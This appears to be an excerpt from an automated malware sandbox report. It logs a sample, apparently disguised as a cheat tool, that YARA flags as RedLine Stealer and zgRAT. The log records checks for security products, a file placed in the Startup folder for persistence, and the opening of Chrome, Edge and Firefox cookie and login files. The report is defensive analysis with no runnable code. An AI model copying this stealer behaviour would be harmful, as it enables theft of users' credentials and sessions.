                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe VolumeInformation
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB7DD4 try_get_function,GetSystemTimeAsFileTime,11_2_00007FF7BADB7DD4
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0094E514 GetUserNameW,29_2_0094E514
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC0F48 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,11_2_00007FF7BADC0F48
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004066CF GetTickCount,KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,GetCommandLineW,GetCommandLineW,wsprintfW,GetModuleFileNameW,wsprintfW,GetCommandLineW,GetCurrentProcess,SetProcessWorkingSetSize,CoInitialize,GetKeyState,GetFileAttributesW,SetCurrentDirectoryW,MessageBoxA,16_2_004066CF
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39067e0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.3a00a80.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.3a00a80.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.jsc.exe.1390000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001D.00000003.2893690929.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894225231.00000000039A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894002689.0000000003959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2951972819.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894424466.00000000039FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2950664507.00000000039A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2893791274.00000000038DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.3026594821.0000000001392000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2950664507.0000000003A02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.3034718882.000000000336B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894095671.0000000004501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2902535107.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2954888933.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894335266.0000000003958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894468357.00000000038FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2951833914.0000000003A02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2950664507.0000000003907000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Yara detected zgRAT
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39067e0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.3a00a80.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.3a00a80.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.jsc.exe.1390000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.2.unpack, type: UNPACKEDPE
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: Carbon.pifBinary or memory string: WIN_81
                        Source: Carbon.pifBinary or memory string: WIN_XP
                        Source: Carbon.pifBinary or memory string: WIN_XPe
                        Source: Carbon.pifBinary or memory string: WIN_VISTA
                        Source: connect.exe, 00000010.00000003.2498656765.00000000028F7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing 